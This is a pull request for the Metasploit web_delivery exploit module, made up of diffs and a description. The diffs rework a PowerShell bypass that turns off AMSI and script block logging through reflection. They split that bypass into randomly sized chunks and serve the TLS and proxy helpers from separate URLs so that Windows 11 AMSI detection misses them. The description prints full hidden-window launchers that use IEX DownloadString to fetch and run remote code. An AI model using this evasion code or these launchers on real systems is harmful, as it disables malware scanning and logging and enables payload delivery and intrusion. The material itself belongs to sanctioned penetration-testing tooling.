### PR TITLE
Improve AMSI bypass for the `web_delivery` module

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -373,7 +373,7 @@ GEM
       rex-arch
     rex-ole (0.1.7)
       rex-text
-    rex-powershell (0.1.97)
+    rex-powershell (0.1.98)
       rex-random_identifier
       rex-text
       ruby-rc4

--- a/data/evasion/windows/bypass_powershell_protections.erb.graphml
+++ b/data/evasion/windows/bypass_powershell_protections.erb.graphml
@@ -8,6 +8,19 @@
   <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
   <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
   <graph edgedefault="directed">
+    <node id="block.0">
+      <data key="address">1</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">1</data>
+        <data key="type">block</data>
+        <node id="block.0:instruction.1">
+          <data key="address">2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.source">If($PSVersionTable.PSVersion.Major -lt 3){Exit}</data>
+        </node>
+      </graph>
+    </node>
     <node id="block.1">
       <data key="address">1</data>
       <data key="type">block</data>
@@ -17,158 +30,114 @@
         <node id="block.1:instruction.1">
           <data key="address">1</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">If($PSVersionTable.PSVersion.Major -ge 3){</data>
+          <data key="instruction.source">$val=[Collections.Generic.Dictionary[string,System.Object]]::new();</data>
         </node>
         <node id="block.1:instruction.2">
           <data key="address">2</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">    $val=[Collections.Generic.Dictionary[string,System.Object]]::new();</data>
+          <data key="instruction.source">$Ref1=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.AmsiUtils', threshold: 0.3) %&gt;);</data>
         </node>
         <node id="block.1:instruction.3">
           <data key="address">3</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">    $Ref1=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.AmsiUtils', threshold: 0.3) %&gt;);</data>
+          <data key="instruction.source">If($Ref1) { $Ref1.GetField(&lt;%= Rex::Powershell::Obfu.scate_string_literal('amsiInitFailed', threshold: 1) %&gt;,'NonPublic,Static').SetValue($null,$true); }</data>
         </node>
         <node id="block.1:instruction.4">
           <data key="address">4</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">    if ($Ref1) { $Ref1.GetField(&lt;%= Rex::Powershell::Obfu.scate_string_literal('amsiInitFailed', threshold: 0.3) %&gt;,'NonPublic,Static').SetValue($null,$true); };</data>
+          <data key="instruction.source">$Ref2=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.Utils') %&gt;);</data>
         </node>
         <node id="block.1:instruction.5">
           <data key="address">5</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">    $Ref2=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.Utils') %&gt;);</data>
+          <data key="instruction.source">$GPF=$Ref2.GetField('cachedGroupPolicySettings','NonPublic,Static');</data>
         </node>
         <node id="block.1:instruction.6">
           <data key="address">6</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">    $GPF=$Ref2.GetField('cachedGroupPolicySettings','NonPublic,Static');</data>
+          <data key="instruction.source">$SBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging') %&gt;;</data>
         </node>
         <node id="block.1:instruction.7">
           <data key="address">7</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">    If ($GPF) {</data>
+          <data key="instruction.source">$EnableSBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockLogging') %&gt;;</data>
         </node>
         <node id="block.1:instruction.8">
           <data key="address">8</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">        $SBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging') %&gt;;</data>
+          <data key="instruction.source">$EnableSBIL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockInvocationLogging') %&gt;;</data>
         </node>
         <node id="block.1:instruction.9">
           <data key="address">9</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">        $EnableSBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockLogging') %&gt;;</data>
+          <data key="instruction.source">If($GPF) { $GPC=$GPF.GetValue($null); }</data>
         </node>
-        <node id="block.1:instruction.10">
-          <data key="address">10</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $EnableSBIL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockInvocationLogging') %&gt;;</data>
-        </node>
-        <node id="block.1:instruction.11">
-          <data key="address">11</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $GPC=$GPF.GetValue($null);</data>
-        </node>
-        <edge source="block.1:instruction.1" target="block.1:instruction.3"/>
-        <edge source="block.1:instruction.1" target="block.1:instruction.5"/>
-        <edge source="block.1:instruction.3" target="block.1:instruction.4"/>
-        <edge source="block.1:instruction.4" target="block.1:instruction.7"/>
-        <edge source="block.1:instruction.5" target="block.1:instruction.6"/>
-        <edge source="block.1:instruction.6" target="block.1:instruction.7"/>
-        <edge source="block.1:instruction.7" target="block.1:instruction.11"/>
+        <edge source="block.1:instruction.2" target="block.1:instruction.3"/>
+        <edge source="block.1:instruction.3" target="block.1:instruction.9"/>
+        <edge source="block.1:instruction.4" target="block.1:instruction.5"/>
+        <edge source="block.1:instruction.5" target="block.1:instruction.9"/>
       </graph>
     </node>
-    <node id="block.12">
+    <node id="block.2">
+      <data key="address">10</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">10</data>
+        <data key="type">block</data>
+        <node id="block.2:instruction.1">
+          <data key="address">10</data>
+          <data key="type">instruction</data>
+          <data key="instruction.source">If($GPF -And $GPC[$SBL]) { $GPC[$SBL][$EnableSBL]=0; }</data>
+        </node>
+        <node id="block.2:instruction.2">
+          <data key="address">11</data>
+          <data key="type">instruction</data>
+          <data key="instruction.source">If($GPF -And $GPC[$SBL]) { $GPC[$SBL][$EnableSBIL]=0; }</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.3">
       <data key="address">12</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
         <data key="address">12</data>
         <data key="type">block</data>
-        <node id="block.12:instruction.12">
+        <node id="block.3:instruction.1">
           <data key="address">12</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">        If($GPC[$SBL]){</data>
+          <data key="instruction.source">If($GPF) { $val.Add($EnableSBL,0); }</data>
         </node>
-        <node id="block.12:instruction.13">
+        <node id="block.3:instruction.2">
           <data key="address">13</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">            $GPC[$SBL][$EnableSBL]=0;</data>
+          <data key="instruction.source">If($GPF) { $val.Add($EnableSBIL,0); }</data>
         </node>
-        <node id="block.12:instruction.14">
+        <node id="block.3:instruction.3">
           <data key="address">14</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">            $GPC[$SBL][$EnableSBIL]=0;</data>
+          <data key="instruction.source">If($GPF) { $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$SBL]=$val; }</data>
         </node>
-        <node id="block.12:instruction.15">
+        <edge source="block.3:instruction.1" target="block.3:instruction.3"/>
+        <edge source="block.3:instruction.2" target="block.3:instruction.3"/>
+      </graph>
+    </node>
+    <node id="block.4">
+      <data key="address">15</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">15</data>
+        <data key="type">block</data>
+        <node id="block.4:instruction.1">
           <data key="address">15</data>
           <data key="type">instruction</data>
-          <data key="instruction.source">        }</data>
+          <data key="instruction.source">If(!$GPF) { [Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.ScriptBlock') %&gt;).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }</data>
         </node>
-        <edge source="block.12:instruction.12" target="block.12:instruction.13"/>
-        <edge source="block.12:instruction.12" target="block.12:instruction.14"/>
-        <edge source="block.12:instruction.13" target="block.12:instruction.15"/>
-        <edge source="block.12:instruction.14" target="block.12:instruction.15"/>
       </graph>
     </node>
-    <node id="block.16">
-      <data key="address">16</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">16</data>
-        <data key="type">block</data>
-        <node id="block.16:instruction.16">
-          <data key="address">16</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $val.Add($EnableSBL,0);</data>
-        </node>
-        <node id="block.16:instruction.17">
-          <data key="address">17</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $val.Add($EnableSBIL,0);</data>
-        </node>
-        <node id="block.16:instruction.18">
-          <data key="address">18</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$SBL]=$val;</data>
-        </node>
-        <edge source="block.16:instruction.16" target="block.16:instruction.18"/>
-        <edge source="block.16:instruction.17" target="block.16:instruction.18"/>
-      </graph>
-    </node>
-    <node id="block.19">
-      <data key="address">19</data>
-      <data key="type">block</data>
-      <graph edgedefault="directed">
-        <data key="address">19</data>
-        <data key="type">block</data>
-        <node id="block.19:instruction.19">
-          <data key="address">19</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    } Else {</data>
-        </node>
-        <node id="block.19:instruction.20">
-          <data key="address">20</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">        [Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.ScriptBlock') %&gt;).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]));</data>
-        </node>
-        <node id="block.19:instruction.21">
-          <data key="address">21</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">    }</data>
-        </node>
-        <node id="block.19:instruction.22">
-          <data key="address">22</data>
-          <data key="type">instruction</data>
-          <data key="instruction.source">};</data>
-        </node>
-        <edge source="block.19:instruction.19" target="block.19:instruction.20"/>
-        <edge source="block.19:instruction.20" target="block.19:instruction.21"/>
-        <edge source="block.19:instruction.21" target="block.19:instruction.22"/>
-      </graph>
-    </node>
-    <edge source="block.1" target="block.12"/>
-    <edge source="block.1" target="block.16"/>
-    <edge source="block.12" target="block.19"/>
-    <edge source="block.16" target="block.19"/>
+    <edge source="block.0" target="block.1"/>
+    <edge source="block.1" target="block.2"/>
+    <edge source="block.1" target="block.3"/>
+    <edge source="block.2" target="block.4"/>
+    <edge source="block.3" target="block.4"/>
   </graph>
 </graphml>

--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -262,10 +262,12 @@ module Exploit::Powershell
   #
   # Return all bypasses checking if PowerShell version > 3
   #
+  # @param split [Integer] The number of parts the final script should be split in
+  #
   # @return [Array<String>] PowerShell code to disable PowerShell Built-In
   #   Protections as an array of <split> elements.
   def bypass_powershell_protections(split = 1)
-    # generate the protections bypass in three short steps
+    # generate the protections bypass in four short steps
     # step 1: shuffle the instructions by rendering the GraphML
     script = Rex::Payloads::Shuffle.from_graphml_file(
       File.join(Msf::Config.install_root, 'data', 'evasion', 'windows', 'bypass_powershell_protections.erb.graphml'),

--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -236,7 +236,7 @@ module Exploit::Powershell
 
     prepend_protections_bypass = opts.delete(:prepend_protections_bypass)
     if %w[ auto true ].include?(prepend_protections_bypass)
-      opts[:prepend] = bypass_powershell_protections
+      opts[:prepend] = bypass_powershell_protections.join
     end
 
     unless opts.key? :shorten
@@ -262,8 +262,9 @@ module Exploit::Powershell
   #
   # Return all bypasses checking if PowerShell version > 3
   #
-  # @return [String] PowerShell code to disable PowerShell Built-In Protections
-  def bypass_powershell_protections
+  # @return [Array<String>] PowerShell code to disable PowerShell Built-In
+  #   Protections as an array of <split> elements.
+  def bypass_powershell_protections(split = 1)
     # generate the protections bypass in three short steps
     # step 1: shuffle the instructions by rendering the GraphML
     script = Rex::Payloads::Shuffle.from_graphml_file(
@@ -274,7 +275,23 @@ module Exploit::Powershell
     # step 3: obfuscate variable names and remove whitespace
     script = Rex::Powershell::Script.new(script)
     script.sub_vars if datastore['Powershell::sub_vars']
-    Rex::Powershell::PshMethods.uglify_ps(script.to_s)
+    # step 4: randomly split the script in chunks (if required)
+    if split > 1
+      script_lines = script.lines
+      if split > script_lines.size
+        raise "Cannot split in #{split} parts since the command has only #{script_lines.size} lines of code"
+      end
+      vprint_status("Splitting bypass protection script in #{split} parts")
+      script_parts = []
+      (split - 1).times do |part|
+        max_for_this_part = script_lines.size - split + part + 1
+        script_parts << script_lines.shift(rand(1..max_for_this_part)).join
+      end
+      script_parts << script_lines.join
+      script_parts.map { |part| Rex::Powershell::PshMethods.uglify_ps(part) }
+    else
+      [Rex::Powershell::PshMethods.uglify_ps(script.to_s)]
+    end
   end
 
   #

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -154,7 +154,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptBool.new('PSH-AmsiBypass', [ true, 'PSH - Request AMSI/SBL bypass before the stager', true ]),
         OptString.new('PSH-AmsiBypassURI', [ false, 'PSH - The URL to use for the AMSI/SBL bypass (Will be random if left blank)', '' ]),
-        OptBool.new('PSH-EncodedCommand', [ true, 'PSH - Use -EncodedCommand for web_delivery launcher', true ]),
+        OptInt.new('PSH-AmsiBypassSplit', [ true, 'PSH - Split the AMSI bypass script in multiple chunks to for evasion. This value indicates the number of chunks (1 means no split).', 1 ]),
+        OptBool.new('PSH-EncodedCommand', [ true, 'PSH - Use -EncodedCommand for web_delivery launcher', false ]),
         OptBool.new('PSH-ForceTLS12', [ true, 'PSH - Force use of TLS v1.2', true ]),
         OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
         OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
@@ -174,8 +175,13 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'PSH'
       uri = get_uri
       if datastore['PSH-AmsiBypass']
-        amsi_uri = uri + amsi_bypass_uri
-        print_line(gen_psh([amsi_uri, uri], 'string').to_s)
+        begin
+          @amsi_bypass_chunks = bypass_powershell_protections(datastore['PSH-AmsiBypassSplit'].to_i)
+        rescue RuntimeError => e
+          fail_with(Msf::Exploit::Failure::BadConfig, "Cannot generate bypass protection script: #{e}")
+        end
+        @amsi_uris = (1..@amsi_bypass_chunks.size).map { |i| "#{amsi_bypass_uri}/#{i}" }
+        print_line(gen_psh(@amsi_uris.map { |u| uri + u } + [uri], 'string').to_s)
       else
         print_line(gen_psh(uri, 'string').to_s)
       end
@@ -199,13 +205,23 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def amsi_bypass_uri
     unless datastore['PSH-AmsiBypassURI'].empty?
-      @amsi_uri = datastore['PSH-AmsiBypassURI']
+      @amsi_bypass_uri = datastore['PSH-AmsiBypassURI']
     end
-    @amsi_uri ||= random_uri
+    @amsi_bypass_uri ||= random_uri
+  end
+
+  def force_tls12_uri
+    @force_tls12_uri ||= random_uri
+  end
+
+  def proxy_aware_uri
+    @proxy_aware_uri ||= random_uri
   end
 
   def on_request_uri(cli, request)
-    if request.raw_uri.to_s.ends_with?('.sct')
+    uri = request.raw_uri.to_s
+
+    if uri.ends_with?('.sct')
       print_status('Handling .sct Request')
       psh = gen_psh(get_uri.to_s, 'string')
 
@@ -222,9 +238,27 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    if request.raw_uri.to_s.ends_with?(amsi_bypass_uri)
-      data = bypass_powershell_protections
-      print_status("Delivering AMSI Bypass (#{data.length} bytes)")
+    if datastore['PSH-AmsiBypass'] && uri.ends_with?(*@amsi_uris)
+      if @amsi_bypass_chunks.blank?
+        @amsi_bypass_chunks = bypass_powershell_protections(datastore['PSH-AmsiBypassSplit'].to_i)
+      end
+      chunk_nb = uri.split('/').last
+      data = @amsi_bypass_chunks[chunk_nb.to_i - 1]
+      print_status("Delivering AMSI Bypass #{chunk_nb}/#{@amsi_bypass_chunks.size}(#{data.length} bytes)")
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+      return
+    end
+
+    if ssl && datastore['PSH-ForceTLS12'] && uri.ends_with?(force_tls12_uri)
+      data = Rex::Powershell::PshMethods.force_tls12
+      print_status("Delivering ForceTLS12 command (#{data.length} bytes)")
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+      return
+    end
+
+    if datastore['PSH-Proxy'] && uri.ends_with?(proxy_aware_uri)
+      data = Rex::Powershell::PshMethods.proxy_aware
+      print_status("Delivering Proxy Aware command (#{data.length} bytes)")
       send_response(cli, data, 'Content-Type' => 'text/plain')
       return
     end
@@ -233,9 +267,13 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'Linux', 'Mac OS X', 'PSH (Binary)'
       data = generate_payload_exe
     when 'PSH', 'Regsvr32', 'pubprn', 'SyncAppvPublishingServer'
+      # Disable this option since the Powershel protection bypass should been done already.
+      opts = {}
+      opts[:prepend_protections_bypass] = false if datastore['PSH-AmsiBypass']
       data = cmd_psh_payload(
         payload.encoded,
-        payload_instance.arch.first
+        payload_instance.arch.first,
+        opts
       )
     else
       data = payload.encoded.to_s
@@ -246,11 +284,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def gen_psh(url, *method)
-    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
-    force_tls12 = Rex::Powershell::PshMethods.force_tls12 if datastore['PSH-ForceTLS12']
+    ignore_cert = ssl ? Rex::Powershell::PshMethods.ignore_ssl_certificate : ''
+    prepended_actions = []
+    prepended_actions << "#{get_uri}#{force_tls12_uri}" if ssl && datastore['PSH-ForceTLS12']
 
     if method.include? 'string'
-      download_string = datastore['PSH-Proxy'] ? Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) : Rex::Powershell::PshMethods.download_and_exec_string(url)
+      prepended_actions << "#{get_uri}#{proxy_aware_uri}" if datastore['PSH-Proxy']
+      download_string = Rex::Powershell::PshMethods.download_and_exec_string(url)
     else
       # Random filename to use, if there isn't anything set
       random = "#{rand_text_alphanumeric(8)}.exe"
@@ -268,7 +308,7 @@ class MetasploitModule < Msf::Exploit::Remote
       download_string = Rex::Powershell::PshMethods.download_run(url, file)
     end
 
-    download_and_run = "#{force_tls12}#{ignore_cert}#{download_string}"
+    download_and_run = "#{ignore_cert}#{Rex::Powershell::PshMethods.download_and_exec_string(prepended_actions)}#{download_string}"
 
     # Generate main PowerShell command
     if datastore['PSH-EncodedCommand']

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -267,7 +267,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'Linux', 'Mac OS X', 'PSH (Binary)'
       data = generate_payload_exe
     when 'PSH', 'Regsvr32', 'pubprn', 'SyncAppvPublishingServer'
-      # Disable this option since the Powershel protection bypass should been done already.
+      # Disable this option since the Powershell protection bypass should been done already.
       opts = {}
       opts[:prepend_protections_bypass] = false if datastore['PSH-AmsiBypass']
       data = cmd_psh_payload(

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
@@ -56,97 +55,98 @@ class MetasploitModule < Msf::Exploit::Remote
           to be served up to be downloaded and executed.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
-            'Ben Campbell',
-            'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
-            'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)
-            'Trenton Ivey', # AppLocker MSF Module (kn0)
-            'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
-            'bcoles', # support for targets: pubprn, SyncAppvPublishingServer and Linux wget
-            'Matt Nelson', # @enigma0x3 // pubprn discovery
-            'phra', # @phraaaaaaa // https://iwantmore.pizza/ - AMSI/SBL bypass
-            'Nick Landers', # @monoxgas // SyncAppvPublishingServer discovery
-          ],
-        'DefaultOptions' =>
-          {
-            'Payload' => 'python/meterpreter/reverse_tcp',
-            'Powershell::exec_in_place' => true
-          },
-        'References' =>
-          [
-            ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
-            ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
-            ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-            ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
-            ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
-            ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'],
-            ['URL', 'https://iwantmore.pizza/posts/amsi.html'],
-            ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/'],
-            ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/'],
-            ['URL', 'https://lolbas-project.github.io/lolbas/Scripts/Pubprn/'],
-          ],
+        'Author' => [
+          'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
+          'Ben Campbell',
+          'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
+          'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)
+          'Trenton Ivey', # AppLocker MSF Module (kn0)
+          'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+          'bcoles', # support for targets: pubprn, SyncAppvPublishingServer and Linux wget
+          'Matt Nelson', # @enigma0x3 // pubprn discovery
+          'phra', # @phraaaaaaa // https://iwantmore.pizza/ - AMSI/SBL bypass
+          'Nick Landers', # @monoxgas // SyncAppvPublishingServer discovery
+        ],
+        'DefaultOptions' => {
+          'Payload' => 'python/meterpreter/reverse_tcp',
+          'Powershell::exec_in_place' => true
+        },
+        'References' => [
+          ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+          ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
+          ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+          ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
+          ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
+          ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'],
+          ['URL', 'https://iwantmore.pizza/posts/amsi.html'],
+          ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/'],
+          ['URL', 'https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/'],
+          ['URL', 'https://lolbas-project.github.io/lolbas/Scripts/Pubprn/'],
+        ],
         'Platform' => %w[python php win linux osx],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Python', {
-                'Platform' => 'python',
-                'Arch' => ARCH_PYTHON
-              }
-            ],
-            [
-              'PHP', {
-                'Platform' => 'php',
-                'Arch' => ARCH_PHP
-              }
-            ],
-            [
-              'PSH', {
-                'Platform' => 'win',
-                'Arch' => [ARCH_X86, ARCH_X64]
-              }
-            ],
-            [
-              'Regsvr32', {
-                'Platform' => 'win',
-                'Arch' => [ARCH_X86, ARCH_X64]
-              }
-            ],
-            [
-              'pubprn', {
-                'Platform' => 'win',
-                'Arch' => [ARCH_X86, ARCH_X64]
-              }
-            ],
-            [
-              'SyncAppvPublishingServer', {
-                'Platform' => 'win',
-                'Arch' => [ARCH_X86, ARCH_X64]
-              }
-            ],
-            [
-              'PSH (Binary)', {
-                'Platform' => 'win',
-                'Arch' => [ARCH_X86, ARCH_X64]
-              }
-            ],
-            [
-              'Linux', {
-                'Platform' => 'linux',
-                'Arch' => [ARCH_X86, ARCH_X64]
-              }
-            ],
-            [
-              'Mac OS X', {
-                'Platform' => 'osx',
-                'Arch' => [ARCH_X86, ARCH_X64]
-              }
-            ],
+            'Python', {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
           ],
+          [
+            'PHP', {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ],
+          [
+            'PSH', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ],
+          [
+            'Regsvr32', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ],
+          [
+            'pubprn', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ],
+          [
+            'SyncAppvPublishingServer', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ],
+          [
+            'PSH (Binary)', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ],
+          [
+            'Linux', {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ],
+          [
+            'Mac OS X', {
+              'Platform' => 'osx',
+              'Arch' => [ARCH_X86, ARCH_X64]
+            }
+          ],
+        ],
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2013-07-19'
+        'DisclosureDate' => '2013-07-19',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
 


### PR DESCRIPTION
The script generated by the `web_delivery` module is blocked by the Antimalware Scan Interface (AMSI) on recent Windows (Windows 11 2H22). This is due to some Powershell scripts prepended to the code responsible to download the AMSI bypass script. More precisely, the script responsible for forcing the use of TLS v1.2 and the script responsible for using the system proxy configuration are both the first code executed before downloading the AMSI bypass.

This PR addresses this by also downloading these additional scripts instead of prepending them directly to the main script. This will prevent being blocked by AMSI.

The changes in this [PR](https://github.com/rapid7/rex-powershell/pull/41) are need for this to work properly.

# Details
Before these changes, the script generated by the modules looked like this when SSL was enabled. The encoding option (`PSH-EncodedCommand`) has been set to `false` to make it easier to read:
```
powershell.exe -nop -w hidden -c [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$S=new-object net.webclient;if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){$S.proxy=[Net.WebRequest]::GetSystemWebProxy();$S.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/rIAnhpfXyT0K/aHfsNZ'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/rIAnhpfXyT0K'));
```
The code responsible for forcing the use of TLS v1.2 and the code responsible for using proxy configuration are prepended to the code that downloads the AMSI bypass script:
```
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
```
```
$S=new-object net.webclient;if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){$S.proxy=[Net.WebRequest]::GetSystemWebProxy();$S.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};
``` 
This code is detected by AMSI as malicious and blocked.

Now, theses two scripts are also downloaded and executed using the same syntaxe:
```
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/lP7hqOFzE8/HQQOIk'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/lP7hqOFzE8/MUbMAFvSwjS'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/lP7hqOFzE8/kMIuxtXI6KUE'));IEX ((new-object Net.WebClient).DownloadString('https://192.168.100.1:8080/lP7hqOFzE8'));
```

Note that the code responsible for ignoring the SSL certificate needs to be executed first in order to the https requests succeed. This is the only piece of code that cannot be delivered separately. This doesn't seem to be an issue and, apparently, AMSI does not block it.

# Other Improvements
A few additional improvements were made to reduce detection:

## Disable encoding by default
The `PSH-EncodedCommand` option is now set to `false` by default. I noticed that the big base64 encoded blob after `powershell.exe -nop -w hidden -e …` is sometimes detected by AMSI as potentially dangerous and disabling encoding seems to be less suspicious.

## Split the detection bypass script
- The AMSI and Script Block Logging bypasses script can now be split in multiple chunks and delivered separately. This avoids having to download the protection bypass code in one big script, which is sometimes blocked by AMSI. Now, instead of having this:
```
IEX ((new-object Net.WebClient).DownloadString('http://192.168.100.1:8080/ewWm0pnyiwZX9r/PF7RCgBiBEx0OhP'))
```
We have multiple download routines in sequence:
```
IEX ((new-object Net.WebClient).DownloadString('http://192.168.100.1:8080/ewWm0pnyiwZX9r/PF7RCgBiBEx0OhP'));IEX ((new-object Net.WebClient).DownloadString('http://192.168.100.1:8080/ewWm0pnyiwZX9r/PF7RCgBiBEx0OhP'));IEX ((new-object Net.WebClient).DownloadString('http://192.168.100.1:8080/ewWm0pnyiwZX9r/PF7RCgBiBEx0OhP'));...
```
Each call downloads a part of the script that will be executed independently, building the whole bypass piece by piece. Note that the number of lines contained in each chunk is randomly generated.

This will increase the size of the final payload, but it will greatly reduce detection. That being said, this is optional and the default behavior is to not split the script. A new `PSH-AmsiBypassSplit` option has been added to control the amount of chunks this should be split into (default is 1).

